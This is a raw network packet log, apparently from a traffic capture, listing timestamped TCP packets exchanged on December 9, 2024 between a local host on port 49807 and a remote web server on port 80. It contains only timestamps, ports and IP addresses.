Dec 9, 2024 08:08:25.551367998 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.552419901 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.552464962 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.552509069 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.552551985 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.553560972 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.553605080 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.553735018 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.553781033 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.554728985 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.554773092 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.554826975 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.554868937 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.556196928 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.556210041 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.556245089 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.557080984 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.557125092 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.557235956 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.557279110 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.558247089 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.558293104 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.558329105 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.558372974 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.559441090 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.559489012 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.559614897 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.559659004 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.560590029 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.560641050 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.560672045 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.560714960 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.561754942 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.561799049 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.561858892 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.561901093 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.562902927 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.562942982 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.563002110 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.563044071 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.564104080 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.564147949 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.564178944 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.564219952 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.565268993 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.565311909 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.565376997 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.565421104 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.566454887 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.566502094 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.566576004 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.566627979 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.567651033 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.567693949 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.567760944 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.567801952 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.568799019 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.568864107 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.568900108 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.568938017 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.569967031 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.570013046 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.570077896 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.570120096 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.571187973 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.571232080 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.571269035 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.571316004 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.572302103 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.572348118 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.572444916 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.572485924 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.573456049 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.573498964 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.573529005 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.573573112 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.574682951 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.574717999 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.574733973 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.574748039 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.575756073 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.575798035 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.706532001 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.706547022 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.706743002 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.707041979 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.707225084 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.707276106 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.708172083 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.708230972 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.708275080 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.709343910 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.709388971 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.709450960 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.710479975 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.710525990 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.710551977 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.711683035 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.711730957 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.711791039 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.711828947 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.712826014 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.713011026 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.713057041 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.714010954 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.714154959 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.714199066 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.715142012 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.715188980 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.715270996 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.716069937 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.716360092 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.716403961 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.716461897 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.716505051 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.717509985 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.717555046 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.717597961 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.717641115 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.718699932 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.718744040 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.718771935 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.718815088 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.719870090 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.719913960 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.719969988 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.720012903 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.721044064 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.721129894 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.721172094 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.722223043 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.722323895 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.722371101 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.723356009 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.723402023 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.723494053 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.724066019 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.724607944 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.724651098 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.724682093 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.724725008 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.725744009 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.725794077 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.725830078 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.725871086 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.726912022 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.726974964 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.727190971 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.727235079 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.728058100 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.728183985 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.728240967 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.729494095 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.729604959 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.729650021 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.730422974 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.730465889 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.730496883 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.731585979 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.731637955 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.731692076 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.732063055 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.732841015 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.732927084 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.732970953 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.734019041 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.734939098 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.734983921 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.735109091 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.735152006 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.735157967 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.736063004 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.736269951 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.736311913 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.736351967 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.736392975 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.737405062 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.737504005 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.737549067 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.738589048 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.738707066 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.738745928 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.739767075 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.739805937 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.739823103 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.739849091 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.740933895 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.741081953 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.741126060 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.742166042 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.742264986 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.742314100 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.743345022 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.743388891 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.743467093 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.744060993 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.744457006 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.744502068 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.744546890 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.744590044 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.745652914 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.745696068 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.745731115 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.746845007 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.746889114 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.746923923 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.748059034 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.748061895 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.748106003 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.748148918 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.749469995 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.749566078 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.749613047 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.750351906 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.750415087 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.750459909 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.751482964 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.751524925 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.751595020 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.752063990 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.752717018 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.752760887 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.752777100 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.752816916 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.753835917 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.753876925 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.753993988 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.754035950 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.755019903 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.755065918 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.755100012 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.756063938 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.756197929 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.756239891 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.756341934 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.756383896 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.757340908 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.757383108 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.757412910 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.757456064 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.758528948 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.758589983 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.758651972 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.758692980 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.759730101 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.759769917 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.759794950 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.759835958 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.760881901 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.760967016 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.761009932 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.762080908 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.762155056 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.762196064 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.763221979 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.763267040 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.763350964 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.764058113 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.764370918 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.764413118 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.764609098 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.765619040 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.765661955 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.765701056 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.766730070 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.766758919 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.766776085 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.766794920 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.767872095 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.768060923 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.898320913 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.898457050 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.898638964 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.898662090 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.898709059 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.898763895 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.900006056 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.900017023 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.900064945 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.900743961 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.900819063 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.900867939 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.901995897 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.902048111 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.902117014 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.903104067 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.903152943 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.903178930 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.904068947 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.904253006 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.904376030 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.904422045 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.905667067 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.905735016 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.905783892 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.906656981 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.906703949 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.906765938 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.907835007 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.907880068 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.907934904 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.908065081 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.909020901 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.909147978 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.909194946 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.910125971 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.910245895 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.910293102 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.911322117 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.911356926 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.911366940 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.911396027 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.912496090 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.912590027 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.912643909 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.913660049 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.913800001 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.913841009 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.914823055 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.914890051 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.914954901 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.916050911 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.916062117 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.916090012 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.916104078 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.916153908 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.917190075 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.917233944 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.917267084 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.918600082 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.918612003 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.918639898 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.918664932 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.919491053 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.919610023 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.919651985 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.920665979 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.920828104 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:25.920874119 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:25.921859026 CET	80	49807	185.215.113.16	192.168.2.4
